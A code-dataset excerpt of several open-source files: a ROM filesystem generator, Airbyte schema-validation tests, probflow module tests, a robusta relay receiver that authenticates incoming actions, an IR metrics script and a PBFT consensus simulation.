max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M)
---|---|---|---|---|
litex/soc/cores/cpu/femtorv/__init__.py | osterwood/litex | 1,501 | 12715289 | <filename>litex/soc/cores/cpu/femtorv/__init__.py<gh_stars>1000+
from litex.soc.cores.cpu.femtorv.core import FemtoRV
|
device/ESP8266_NodeMcu_Slave/tools/mkfs.py | zhang49/All | 205 | 12715307 | #!/usr/bin/env python3
#
import sys
import struct
import math
import time
import argparse
import os
import subprocess
import zlib
import gzip
class MKFS:
def __init__(self, src, dest):
self._src = src
self._dest = dest
self._fileCount = 0
self.data=bytearray()
self.offset=0
def output_writeln(self,line):
self.file_dest.write(line+'\r\n')
def writeFile(self,path,filename,compress):
with open(path, "rb") as f:
fileBytes = f.read()
if compress:
gzip_compress = zlib.compressobj(9, zlib.DEFLATED, zlib.MAX_WBITS | 16)
gzip_data = gzip_compress.compress(fileBytes) + gzip_compress.flush()
fileBytes = gzip_data
fileLen = len(fileBytes)
fileBytes = bytearray(fileBytes)
self.output_writeln('\t\t{')
self.output_writeln('\t\t.size='+str(fileLen)+',')
self.output_writeln('\t\t.name = "'+filename+'",')
if compress:
self.output_writeln('\t\t.gzip=1,')
else:
self.output_writeln('\t\t.gzip=0,')
self.output_writeln('\t\t.offset='+str(self.offset))
#append data
for b in fileBytes:
self.data.append(b)
if self._innerCount == self._fileCount-1:
self.output_writeln('\t\t}')
else:
self.output_writeln('\t\t},')
self._innerCount+=1
self.offset+=fileLen;
#align
rest = 4-(self.offset)%4;
while rest > 0:
self.offset=self.offset+1
self.data.append(0);
rest=rest-1
def count(self):
for dirname, dirnames, filenames in os.walk(self._src):
# print path to all filenames.
for filename in filenames:
self._fileCount+=1
if '.bak' in dirnames:
dirnames.remove('.bak')
if '.git' in dirnames:
# don't go into any .git directories.
dirnames.remove('.git')
def run(self):
self.file_dest = open(self._dest,'w')
self.count()
self.output_writeln('//Generated by MKFS tool')
self.output_writeln('//')
self.output_writeln('#include "rofs.h"')
self.output_writeln('#include "c_types.h"')
self.output_writeln('#define ROFS_FILE_COUNT '+str(self._fileCount))
self.output_writeln('const RO_FS ro_file_system = {')
self.output_writeln('\t.count='+str(self._fileCount)+',')
self.output_writeln('\t.files={')
self._innerCount=0;
#make full path
for dirname, dirnames, filenames in os.walk(self._src):
# print path to all filenames.
for filename in filenames:
self.writeFile(os.path.join(dirname,filename),filename,1)
# Advanced usage:
# editing the 'dirnames' list will stop os.walk() from recursing into there.
if '.git' in dirnames:
# don't go into any .git directories.
dirnames.remove('.git')
if '.bak' in dirnames:
dirnames.remove('.bak')
self.output_writeln('\t}')
self.output_writeln('};')
fileHex = ', '.join(hex(x) for x in self.data)
self.output_writeln('const ICACHE_STORE_ATTR ICACHE_RODATA_ATTR uint8_t rofs_data[]={'+fileHex+'};')
#self.output_writeln('static ROFS_FILE_ENTRY ro_file_system_entries[]={'+','.join('file'+str(x) for x in range(0,self._fileCount-1))+'};')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'ROM FS make from dir', prog = 'mkfs')
parser.add_argument(
'--src', '-s',
help = 'Source directory')
parser.add_argument(
'--dest', '-d',
help = 'Destination file')
parser.add_argument(
'--gzip', '-z',
        help = 'Compress files with gzip',
default=1)
args = parser.parse_args()
mkfs = MKFS(args.src,args.dest)
mkfs.run()
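# Added usage sketch (paths here are hypothetical, not taken from the repo):
#   python3 mkfs.py --src ./webroot --dest rofs_files.h
# Each file under --src is gzip-compressed and packed into the 4-byte-aligned
# rofs_data[] array, with a RO_FS entry recording its name, size, gzip flag and offset.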
|
airbyte-integrations/bases/source-acceptance-test/unit_tests/test_asserts.py | OTRI-Unipd/OTRI-airbyte | 6,215 | 12715313 | <gh_stars>1000+
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import pytest
from airbyte_cdk.models import (
AirbyteRecordMessage,
AirbyteStream,
ConfiguredAirbyteCatalog,
ConfiguredAirbyteStream,
DestinationSyncMode,
SyncMode,
)
from source_acceptance_test.utils.asserts import verify_records_schema
@pytest.fixture(name="record_schema")
def record_schema_fixture():
return {
"properties": {
"text_or_null": {"type": ["null", "string"]},
"number_or_null": {"type": ["null", "number"]},
"text": {"type": ["string"]},
"number": {"type": ["number"]},
},
"type": ["null", "object"],
}
@pytest.fixture(name="configured_catalog")
def catalog_fixture(request, record_schema) -> ConfiguredAirbyteCatalog:
record_schema = request.param if hasattr(request, "param") else record_schema
stream = ConfiguredAirbyteStream(
stream=AirbyteStream(name="my_stream", json_schema=record_schema),
sync_mode=SyncMode.full_refresh,
destination_sync_mode=DestinationSyncMode.append,
)
return ConfiguredAirbyteCatalog(streams=[stream])
def test_verify_records_schema(configured_catalog: ConfiguredAirbyteCatalog):
"""Test that correct records returned as records with errors, and verify specific error messages"""
records = [
{
"text_or_null": 123, # wrong format
"number_or_null": 10.3,
"text": "text",
"number": "text", # wrong format
},
{
"text_or_null": "test",
"number_or_null": None,
"text": None, # wrong value
"number": None, # wrong value
},
{
"text_or_null": None,
"number_or_null": None,
"text": "text",
"number": 77,
},
{
"text_or_null": None,
"number_or_null": None,
"text": "text",
"number": "text", # wrong format
},
]
records = [AirbyteRecordMessage(stream="my_stream", data=record, emitted_at=0) for record in records]
streams_with_errors = verify_records_schema(records, configured_catalog)
errors = [error.message for error in streams_with_errors["my_stream"].values()]
assert "my_stream" in streams_with_errors
assert len(streams_with_errors) == 1, "only one stream"
assert len(streams_with_errors["my_stream"]) == 3, "only first error for each field"
assert errors == ["123 is not of type 'null', 'string'", "'text' is not of type 'number'", "None is not of type 'string'"]
@pytest.mark.parametrize(
"record, configured_catalog, valid",
[
# Send null data
({"a": None}, {"type": "object", "properties": {"a": {"type": "string", "format": "time"}}}, False),
# time
({"a": "sdf"}, {"type": "object", "properties": {"a": {"type": "string", "format": "time"}}}, False),
({"a": "12:00"}, {"type": "object", "properties": {"a": {"type": "string", "format": "time"}}}, False),
({"a": "12:00:90"}, {"type": "object", "properties": {"a": {"type": "string", "format": "time"}}}, False),
({"a": "12:00:22"}, {"type": "object", "properties": {"a": {"type": "string", "format": "time"}}}, True),
# date
({"a": "12:00:90"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date"}}}, False),
({"a": "2020-12-20"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date"}}}, True),
({"a": "2020-20-20"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date"}}}, False),
# date-time
# full date-time format with timezone only valid, according to https://datatracker.ietf.org/doc/html/rfc3339#section-5.6
({"a": "12:11:00"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, False),
({"a": "2018-11-13 20:20:39"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, True),
({"a": "2021-08-10T12:43:15"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, True),
({"a": "2021-08-10T12:43:15Z"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, True),
({"a": "2018-11-13T20:20:39+00:00"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, True),
({"a": "2018-21-13T20:20:39+00:00"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, False),
# This is valid for postgres sql but not valid for bigquery
({"a": "2014-09-27 9:35z"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, False),
# Seconds are obligatory for bigquery timestamp
({"a": "2014-09-27 9:35"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, False),
({"a": "2014-09-27 9:35:0z"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, True),
# email
({"a": "2018-11-13 20:20:39"}, {"type": "object", "properties": {"a": {"type": "string", "format": "email"}}}, False),
({"a": "<EMAIL>"}, {"type": "object", "properties": {"a": {"type": "string", "format": "email"}}}, True),
({"a": "<EMAIL>"}, {"type": "object", "properties": {"a": {"type": "string", "format": "email"}}}, True),
({"a": "写电子邮件@子邮件"}, {"type": "object", "properties": {"a": {"type": "string", "format": "email"}}}, True),
# hostname
({"a": "2018-11-13 20:20:39"}, {"type": "object", "properties": {"a": {"type": "string", "format": "hostname"}}}, False),
({"a": "<EMAIL>"}, {"type": "object", "properties": {"a": {"type": "string", "format": "hostname"}}}, False),
({"a": "localhost"}, {"type": "object", "properties": {"a": {"type": "string", "format": "hostname"}}}, True),
({"a": "example.com"}, {"type": "object", "properties": {"a": {"type": "string", "format": "hostname"}}}, True),
# ipv4
({"a": "example.com"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv4"}}}, False),
({"a": "0.0.0.1000"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv4"}}}, False),
({"a": "0.0.0.0"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv4"}}}, True),
# ipv6
({"a": "example.com"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv6"}}}, False),
({"a": "fc00:db20:35b:7399::5"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv6"}}}, True),
({"a": "::1"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv6"}}}, True),
({"a": "::"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv6"}}}, True),
],
indirect=["configured_catalog"],
)
def test_validate_records_format(record, configured_catalog, valid):
records = [AirbyteRecordMessage(stream="my_stream", data=record, emitted_at=0)]
streams_with_errors = verify_records_schema(records, configured_catalog)
if valid:
assert not streams_with_errors
else:
assert streams_with_errors, f"Record {record} should produce errors against {configured_catalog.streams[0].stream.json_schema}"
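# Added sketch: verify_records_schema presumably relies on jsonschema-style format
# validation; a minimal standalone equivalent (assumed, not part of this test module)
# would be:
#   from jsonschema import Draft7Validator, FormatChecker
#   schema = {"type": "object", "properties": {"a": {"type": "string", "format": "ipv4"}}}
#   validator = Draft7Validator(schema, format_checker=FormatChecker())
#   assert not list(validator.iter_errors({"a": "0.0.0.0"}))
#   assert list(validator.iter_errors({"a": "0.0.0.1000"}))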
|
validation_tests/analytical_exact/runup_on_beach/produce_results.py | samcom12/anuga_core | 136 | 12715320 | <gh_stars>100-1000
import anuga
from anuga.validation_utilities import produce_report
args = anuga.get_args()
produce_report('numerical_runup.py', args=args)
|
tests/unit/tensorflow/modules/test_sequential.py | chiragnagpal/probflow | 134 | 12715330 | import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from probflow.modules import Dense, Sequential
from probflow.parameters import Parameter
from probflow.utils.settings import Sampling
tfd = tfp.distributions
def is_close(a, b, tol=1e-3):
return np.abs(a - b) < tol
def test_Sequential():
"""Tests probflow.modules.Sequential"""
# Create the module
seq = Sequential(
[Dense(5, 10), tf.nn.relu, Dense(10, 3), tf.nn.relu, Dense(3, 1)]
)
# Steps should be list
assert isinstance(seq.steps, list)
assert len(seq.steps) == 5
# Test MAP outputs are the same
x = tf.random.normal([4, 5])
samples1 = seq(x)
samples2 = seq(x)
assert np.all(samples1.numpy() == samples2.numpy())
assert samples1.ndim == 2
assert samples1.shape[0] == 4
assert samples1.shape[1] == 1
# Test samples are different
with Sampling(n=1):
samples1 = seq(x)
samples2 = seq(x)
assert np.all(samples1.numpy() != samples2.numpy())
assert samples1.ndim == 2
assert samples1.shape[0] == 4
assert samples1.shape[1] == 1
# parameters should return list of all parameters
param_list = seq.parameters
assert isinstance(param_list, list)
assert len(param_list) == 6
assert all(isinstance(p, Parameter) for p in param_list)
param_names = [p.name for p in seq.parameters]
assert "Dense_weights" in param_names
assert "Dense_bias" in param_names
param_shapes = [p.shape for p in seq.parameters]
assert [5, 10] in param_shapes
assert [1, 10] in param_shapes
assert [10, 3] in param_shapes
assert [1, 3] in param_shapes
assert [3, 1] in param_shapes
assert [1, 1] in param_shapes
# kl_loss should return sum of KL losses
kl_loss = seq.kl_loss()
assert isinstance(kl_loss, tf.Tensor)
assert kl_loss.ndim == 0
|
src/robusta/integrations/receiver.py | robusta-dev/robusta | 273 | 12715356 | <filename>src/robusta/integrations/receiver.py
import base64
import hashlib
import hmac
import logging
import time
from typing import Optional, Dict, Any
from uuid import UUID
import websocket
import json
import os
from threading import Thread
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey
from ..core.playbooks.playbook_utils import to_safe_str
from ..core.playbooks.playbooks_event_handler import PlaybooksEventHandler
from ..core.model.env_vars import INCOMING_REQUEST_TIME_WINDOW_SECONDS, RUNNER_VERSION
from ..core.reporting.action_requests import (
ExternalActionRequest,
ActionRequestBody,
sign_action_request, PartialAuth,
)
from ..utils.auth_provider import AuthProvider
WEBSOCKET_RELAY_ADDRESS = os.environ.get(
"WEBSOCKET_RELAY_ADDRESS", "wss://relay.robusta.dev"
)
CLOUD_ROUTING = json.loads(os.environ.get("CLOUD_ROUTING", "True").lower())
RECEIVER_ENABLE_WEBSOCKET_TRACING = json.loads(
os.environ.get("RECEIVER_ENABLE_WEBSOCKET_TRACING", "False").lower()
)
INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC = int(
os.environ.get("INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC", 3)
)
class ActionRequestReceiver:
def __init__(self, event_handler: PlaybooksEventHandler):
self.event_handler = event_handler
self.active = True
self.account_id = self.event_handler.get_global_config().get("account_id")
self.cluster_name = self.event_handler.get_global_config().get("cluster_name")
self.auth_provider = AuthProvider()
self.ws = websocket.WebSocketApp(
WEBSOCKET_RELAY_ADDRESS,
on_open=self.on_open,
on_message=self.on_message,
on_error=self.on_error,
)
if not self.account_id or not self.cluster_name:
logging.error(
f"Action receiver cannot start. "
f"Missing required account_id {self.account_id} cluster_name {self.cluster_name}"
)
return
self.start_receiver()
def start_receiver(self):
if not CLOUD_ROUTING:
logging.info(
"outgoing messages only mode. Incoming event receiver not initialized"
)
return
if WEBSOCKET_RELAY_ADDRESS == "":
logging.warning("relay address empty. Not initializing relay")
return
websocket.enableTrace(RECEIVER_ENABLE_WEBSOCKET_TRACING)
receiver_thread = Thread(target=self.run_forever)
receiver_thread.start()
def run_forever(self):
logging.info("starting relay receiver")
while self.active:
self.ws.run_forever()
logging.info("relay websocket closed")
time.sleep(INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC)
def stop(self):
logging.info(f"Stopping incoming receiver")
self.active = False
self.ws.close()
@classmethod
def __sync_response(cls, status_code: int, request_id: str, data) -> Dict:
return {
"action": "response",
"request_id": request_id,
"status_code": status_code,
"data": data
}
def __exec_external_request(
self, action_request: ExternalActionRequest, validate_timestamp: bool
):
logging.info(f"Callback `{action_request.body.action_name}` {to_safe_str(action_request.body.action_params)}")
sync_response = action_request.request_id != "" # if request_id is set, we need to write back the response
if not self.__validate_request(action_request, validate_timestamp):
req_json = action_request.json(exclude={"body"})
body_json = action_request.body.json(exclude={"action_params"}) # action params already printed above
logging.error(f"Failed to validate action request {req_json} {body_json}")
if sync_response:
self.ws.send(data=json.dumps(self.__sync_response(401, action_request.request_id, "")))
return
response = self.event_handler.run_external_action(
action_request.body.action_name,
action_request.body.action_params,
action_request.body.sinks,
sync_response,
action_request.no_sinks,
)
if sync_response:
http_code = 200 if response.get("success") else 500
self.ws.send(data=json.dumps(self.__sync_response(http_code, action_request.request_id, response)))
def on_message(self, ws, message):
# TODO: use typed pydantic classes here?
incoming_event = json.loads(message)
actions = incoming_event.get("actions", None)
if actions: # this is slack callback format
            # slack callbacks have a list of 'actions'. Within each action there is a 'value' field,
            # which contains the actual action details we need to run.
# This wrapper format is part of the slack API, and cannot be changed by us.
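            # Illustrative shape of such a payload (assumed, simplified):
            #   {"actions": [{"value": "<JSON-encoded ExternalActionRequest>"}]}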
for action in actions:
raw_action = action.get("value", None)
try:
self.__exec_external_request(
ExternalActionRequest.parse_raw(raw_action), False
)
except Exception:
logging.error(
f"Failed to run incoming event {ActionRequestReceiver._stringify_incoming_event(raw_action)}",
exc_info=True
)
else: # assume it's ActionRequest format
try:
self.__exec_external_request(
ExternalActionRequest(**incoming_event), True
)
except Exception:
logging.error(
f"Failed to run incoming event {ActionRequestReceiver._stringify_incoming_event(incoming_event)}",
exc_info=True
)
@staticmethod
def _stringify_incoming_event(incoming_event) -> str:
"""Stringify incoming request masking action params in case it contains secrets"""
if isinstance(incoming_event, str): # slack format, stringified json
try:
event_dict = json.loads(incoming_event)
except Exception:
logging.error("Failed to parse raw incoming event", exc_info=True)
return "parse error"
elif isinstance(incoming_event, dict):
event_dict = incoming_event
else:
return f"Unknown incoming_event type {type(incoming_event)}"
body = event_dict.pop("body", {})
action_params = body.pop("action_params", {})
return f"{event_dict} {body} {to_safe_str(action_params)}"
def on_error(self, ws, error):
logging.info(f"Relay websocket error: {error}")
def on_open(self, ws):
account_id = self.event_handler.get_global_config().get("account_id")
cluster_name = self.event_handler.get_global_config().get("cluster_name")
open_payload = {
"action": "auth",
"account_id": account_id,
"cluster_name": cluster_name,
"version": RUNNER_VERSION,
}
logging.info(
f"connecting to server as account_id={account_id}; cluster_name={cluster_name}"
)
ws.send(json.dumps(open_payload))
def __validate_request(self, action_request: ExternalActionRequest, validate_timestamp: bool) -> bool:
"""
Two auth protocols are supported:
1. signature - Signing the body using the signing_key should match the signature
2. partial keys auth - using partial_auth_a and partial_auth_b
Each partial auth should be decrypted using the private key (rsa private key).
The content should have 2 items:
- key
- body hash
The operation key_a XOR key_b should be equal to the signing_key
If both protocols are present, we only check the signature
"""
if validate_timestamp and (
time.time() - action_request.body.timestamp
> INCOMING_REQUEST_TIME_WINDOW_SECONDS
):
logging.error(
f"Rejecting incoming request because it's too old. Cannot verify request {action_request}"
)
return False
signing_key = self.event_handler.get_global_config().get("signing_key")
body = action_request.body
if not signing_key:
logging.error(f"Signing key not available. Cannot verify request {body}")
return False
# First auth protocol option, based on signature only
signature = action_request.signature
if signature:
generated_signature = sign_action_request(body, signing_key)
return hmac.compare_digest(generated_signature, signature)
# Second auth protocol option, based on public key
partial_auth_a = action_request.partial_auth_a
partial_auth_b = action_request.partial_auth_b
if not partial_auth_a or not partial_auth_b:
logging.error(f"Insufficient authentication data. Cannot verify request {body}")
return False
private_key = self.auth_provider.get_private_rsa_key()
if not private_key:
logging.error(f"Private RSA key missing. Cannot validate request for {body}")
return False
a_valid, key_a = self.__extract_key_and_validate(partial_auth_a, private_key, body)
b_valid, key_b = self.__extract_key_and_validate(partial_auth_b, private_key, body)
if not a_valid or not b_valid:
logging.error(f"Cloud not validate partial auth for {body}")
return False
try:
signing_key_uuid = UUID(signing_key)
except Exception:
logging.error(f"Wrong signing key format. Cannot validate parital auth for {body}")
return False
if (key_a.int ^ key_b.int) != signing_key_uuid.int:
logging.error(f"Partial auth keys combination mismatch for {body}")
return False
return True
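    # Added illustration (not part of the original code): how a sender could split
    # the signing key into the two partial keys checked above. All names below are
    # hypothetical.
    #
    #   import secrets, uuid
    #   signing_key = uuid.uuid4()
    #   key_a = uuid.UUID(int=secrets.randbits(128))
    #   key_b = uuid.UUID(int=signing_key.int ^ key_a.int)
    #   assert (key_a.int ^ key_b.int) == signing_key.int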
@classmethod
def __extract_key_and_validate(
cls,
encrypted: str,
private_key: RSAPrivateKey,
body: ActionRequestBody
) -> (bool, Optional[UUID]):
try:
plain = private_key.decrypt(
base64.b64decode(encrypted.encode("utf-8")),
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
auth = PartialAuth(**json.loads(plain.decode("utf-8")))
body_string = body.json(exclude_none=True, sort_keys=True, separators=(',', ':')).encode("utf-8")
body_hash = f"v0={hashlib.sha256(body_string).hexdigest()}"
return hmac.compare_digest(body_hash, auth.hash), auth.key
except Exception:
logging.error("Error validating partial auth data", exc_info=True)
return False, None
|
addons/s3/tests/utils.py | gaybro8777/osf.io | 628 | 12715395 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from addons.base.tests.base import OAuthAddonTestCaseMixin, AddonTestCase
from addons.s3.tests.factories import S3AccountFactory
from addons.s3.provider import S3Provider
from addons.s3.serializer import S3Serializer
class S3AddonTestCase(OAuthAddonTestCaseMixin, AddonTestCase):
ADDON_SHORT_NAME = 's3'
ExternalAccountFactory = S3AccountFactory
Provider = S3Provider
Serializer = S3Serializer
client = None
folder = {
'path': 'bucket',
'name': 'bucket',
'id': 'bucket'
}
|
admin/preprints/forms.py | gaybro8777/osf.io | 628 | 12715396 | from django import forms
from osf.models import Preprint
class ChangeProviderForm(forms.ModelForm):
class Meta:
model = Preprint
fields = ('provider',)
|
corehq/apps/hqadmin/tests/test_corrupt_couch.py | dimagilg/commcare-hq | 471 | 12715437 | from testil import eq
from ..corrupt_couch import find_missing_ids
def test_find_missing_ids():
def test(result_sets, expected_missing, expected_tries, min_tries=5):
def get_ids():
while len(results) > 1:
return results.pop()
return results[0]
results = list(reversed(result_sets))
missing, tries = find_missing_ids(get_ids, min_tries)
eq(missing, expected_missing)
eq(tries, expected_tries)
yield test, [{1, 2}], set(), 5
yield test, [{1, 2}], set(), 6, 6
yield test, [{1, 2}], set(), 10, 10
yield test, [{1, 2}, {1, 3}, {2, 3}], {1, 2, 3}, 7
yield test, [{1, 2}, {1, 3}, {1, 3}, {1, 3}, {1, 3}, {2, 3}], {1, 2, 3}, 10
yield test, [{1, 2}] + [{1, 3}] * 5 + [{2, 4}], {2, 3}, 6
yield test, [{1, 2}] + [{1, 3}] * 10 + [{2, 4}], {2, 3}, 11, 10
|
onir/bin/eval.py | tgeral68/OpenNIR | 140 | 12715457 | <filename>onir/bin/eval.py
import os
os.environ['ONIR_IGNORE_ARGV'] = 'true'
import json
import argparse
from onir import metrics
def main():
parser = argparse.ArgumentParser()
parser.add_argument('qrels')
parser.add_argument('run')
parser.add_argument('--each_topic', '-q', action='store_true')
parser.add_argument('--nosummary', '-n', action='store_true')
parser.add_argument('--json_output', '-j', action='store_true')
parser.add_argument('--verbose', '-v', action='store_true')
parser.add_argument('metrics', nargs='+')
args = parser.parse_args()
result = metrics.calc(args.qrels, args.run, args.metrics, verbose=args.verbose)
if args.json_output:
print(json.dumps(result))
elif result:
if args.each_topic:
for qid in result[args.metrics[0]]:
for metric in args.metrics:
print(f'{metric}\t{qid}\t{result[metric][qid]:.4f}')
if not args.nosummary:
for metric, mean in metrics.mean(result).items():
print(f'{metric}\tall\t{mean:.4f}')
if __name__ == '__main__':
main()
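# Example invocation (sketch; the metric names are illustrative):
#   python -m onir.bin.eval path/to.qrels path/to.run map ndcg@20 -q
# prints per-topic lines for each metric when -q is given, followed by the
# per-metric means unless -n/--nosummary is passed; -j emits JSON instead.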
|
forge/ethyr/torch/optim.py | wwxFromTju/neural-mmo | 1,450 | 12715469 | <filename>forge/ethyr/torch/optim.py
import numpy as np
import torch
from torch import optim
from torch.autograd import Variable
from pdb import set_trace as T
from forge.ethyr import rollouts
from forge.ethyr.torch import loss
from forge.ethyr.torch import param
class ManualAdam(optim.Adam):
def step(self, grads):
grads = Variable(torch.Tensor(np.array(grads)))
self.param_groups[0]['params'][0].grad = grads
super().step()
class ManualSGD(optim.SGD):
def step(self, grads):
grads = Variable(torch.Tensor(np.array(grads)))
self.param_groups[0]['params'][0].grad = grads
super().step()
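# Added usage sketch (hypothetical shapes, not from the original repo): these
# optimizers take externally computed gradients instead of relying on autograd.
#   flat = torch.zeros(10, requires_grad=True)
#   opt = ManualAdam([flat], lr=1e-3)
#   opt.step(np.zeros(10))   # injects the gradient, then runs a normal Adam step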
def backward(rolls, anns, valWeight=0.5, entWeight=0):
atns, vals, rets = rollouts.mergeRollouts(rolls.values())
returns = torch.tensor(rets).view(-1, 1).float()
vals = torch.cat(vals)
pg, entropy, attackentropy = 0, 0, 0
for i, atnList in enumerate(atns):
aArg, aArgIdx = list(zip(*atnList))
aArgIdx = torch.stack(aArgIdx)
l, e = loss.PG(aArg, aArgIdx, vals, returns)
pg += l
entropy += e
valLoss = loss.valueLoss(vals, returns)
totLoss = pg + valWeight*valLoss + entWeight*entropy
totLoss.backward()
grads = [param.getGrads(ann) for ann in anns]
reward = np.mean(rets)
return reward, vals.mean(), grads, pg, valLoss, entropy
|
quarkchain/experimental/pbft.py | QuarkChain/pyquarkchain | 237 | 12715481 | <gh_stars>100-1000
import asyncio
import hashlib
from event_driven_simulator import Connection
RPC_TIMEOUT_MS = 100
class ClientRequest:
def __init__(self, data):
self.data = data
def digest(self):
m = hashlib.sha256()
m.update(self.data)
return m.digest()
class PrePrepareMsg:
def __init__(self, view, seq_num, digest, m, sig):
self.view = view
# Seq number
self.seq_num = seq_num
# Client request digest
self.digest = digest
# Client request (can be carried by different transport)
self.m = m
# Siganture
self.sig = sig
class PrepareMsg:
def __init__(self, view, seq_num, digest, node_id, sig):
# View
self.view = view
# Seq number
self.seq_num = seq_num
# Digest
self.digest = digest
# Node id (may not needed as node_id can be identified from sig)
self.node_id = node_id
self.sig = sig
class CommitMsg:
def __init__(self, view, seq_num, digest, node_id, sig):
self.view = view
self.seq_num = seq_num
self.digest = digest
self.node_id = node_id
self.sig = sig
class CheckpointMsg:
def __init__(self, seq_num, state_digest, sign):
self.seq_num = seq_num
self.state_digest = state_digest
self.sign = sign
class Node:
def __init__(self, node_id, view, is_primary=False):
self.node_id = node_id
self.is_primary = is_primary
# TODO
self.primary_node_id = 0
self.view = view
self.connection_list = []
self.isCrashing = False
self.state = b""
# TODO
self.h = 0
self.H = 10000
self.seq_num = 0
# Received messages. all should be persisted
# Could be removed after checkpoint
self.pre_prepare_msg_map = dict()
self.prepare_msg_map = dict()
self.commit_msg_map = dict()
self.committed_set = set()
def addConnection(self, conn):
self.connection_list.append(conn)
def __get_seq_num(self):
# TODO: H check
self.seq_num += 1
return self.seq_num
async def start(self):
while True:
await asyncio.sleep(1)
def sendClientRequest(self, m):
if not self.is_primary:
return None
msg = PrePrepareMsg(
self.view, self.__get_seq_num(), m.digest(), m, self.node_id
)
self.pre_prepare_msg_map[msg.seq_num] = msg
print(
"Node {}: sending pre-prepare msg, seq no {}, digest {}".format(
self.node_id, msg.seq_num, msg.digest.hex()
)
)
for conn in self.connection_list:
asyncio.ensure_future(conn.sendPrePrepareMsgAsync(msg))
# RPC handling
def handlePrePrepareMsg(self, msg):
if self.view != msg.view:
return
if self.primary_node_id != msg.sig:
return
if msg.seq_num < self.h or msg.seq_num > self.H:
return
if msg.seq_num in self.pre_prepare_msg_map:
return
print(
"Node {}: processing pre-prepare msg, seq no {}, digest {}".format(
self.node_id, msg.seq_num, msg.digest.hex()
)
)
self.pre_prepare_msg_map[msg.seq_num] = msg
self.prepare_msg_map.setdefault(msg.seq_num, set()).add(self.node_id)
prepare_msg = PrepareMsg(
msg.view, msg.seq_num, msg.digest, self.node_id, self.node_id
)
for conn in self.connection_list:
asyncio.ensure_future(conn.sendPrepareMsgAsync(prepare_msg))
def __num_2f(self):
f = (len(self.connection_list) + 1 - 1) // 3
return 2 * f
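    # Added note: with the default N = 4 replicas below, f = (4 - 1) // 3 = 1, so a
    # request is "prepared" after 2f = 2 prepare votes and committed after 2f + 1 = 3
    # commit votes (each backup also counts its own vote in both maps).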
def __is_prepared(self, seq_num):
return len(self.prepare_msg_map.get(seq_num, set())) >= self.__num_2f()
def handlePrepareMsg(self, msg):
if self.view != msg.view:
return
# TODO: May cache the prepare message until pre_prepare is received.
if msg.seq_num not in self.pre_prepare_msg_map:
return
pre_prepare_msg = self.pre_prepare_msg_map[msg.seq_num]
if pre_prepare_msg.digest != msg.digest:
return
print(
"Node {}: processing prepare msg from {}, seq no {}, digest {}".format(
self.node_id, msg.node_id, msg.seq_num, msg.digest.hex()
)
)
is_prepared_before = self.__is_prepared(msg.seq_num)
self.prepare_msg_map.setdefault(msg.seq_num, set()).add(msg.node_id)
if not is_prepared_before and self.__is_prepared(msg.seq_num):
# Broadcast commit
self.commit_msg_map.setdefault(msg.seq_num, set()).add(self.node_id)
commit_msg = CommitMsg(
msg.view, msg.seq_num, msg.digest, self.node_id, self.node_id
)
print(
"Node {}: sending commit msg, seq no {}, digest {}".format(
self.node_id, msg.seq_num, msg.digest.hex()
)
)
for conn in self.connection_list:
asyncio.ensure_future(conn.sendCommitMsgAsync(commit_msg))
def handleCommitMsg(self, msg):
if self.view != msg.view:
return
if msg.seq_num not in self.pre_prepare_msg_map:
return
pre_prepare_msg = self.pre_prepare_msg_map[msg.seq_num]
if pre_prepare_msg.digest != msg.digest:
return
print(
"Node {}: processing commit msg from {}, seq no {}, digest {}".format(
self.node_id, msg.node_id, msg.seq_num, msg.digest.hex()
)
)
self.commit_msg_map.setdefault(msg.seq_num, set()).add(msg.node_id)
if (
len(self.commit_msg_map[msg.seq_num]) >= self.__num_2f() + 1
and msg.seq_num not in self.committed_set
):
# TODO: Check the requests with lower sequences are executed (finalized)
# Message is irreversible/finalized.
# May discard all logs of the message,
# but current view-change protocol needs prepare messages.
# May replace with the digest as key
self.committed_set.add(msg.seq_num)
# Simple state execution
s = hashlib.sha256()
s.update(self.state)
s.update(pre_prepare_msg.m.digest())
self.state = s.digest()
print(
"Node {}: msg with digest {} commited, state {}".format(
self.node_id, msg.digest.hex(), self.state.hex()
)
)
checkpoint_msg = CheckpointMsg(msg.seq_num, self.state, self.node_id)
for conn in self.connection_list:
asyncio.ensure_future(conn.sendCheckpointMsgAsync(checkpoint_msg))
def handleCheckpointMsg(self, msg):
pass
class PbftConnection(Connection):
def __init__(
self,
source,
destination,
timeoutMs=RPC_TIMEOUT_MS,
networkDelayGenerator=lambda: 0,
):
super().__init__(source, destination, timeoutMs, networkDelayGenerator)
async def sendPrePrepareMsgAsync(self, request):
return await self.callWithDelayOrTimeout(
lambda: self.destination.handlePrePrepareMsg(request)
)
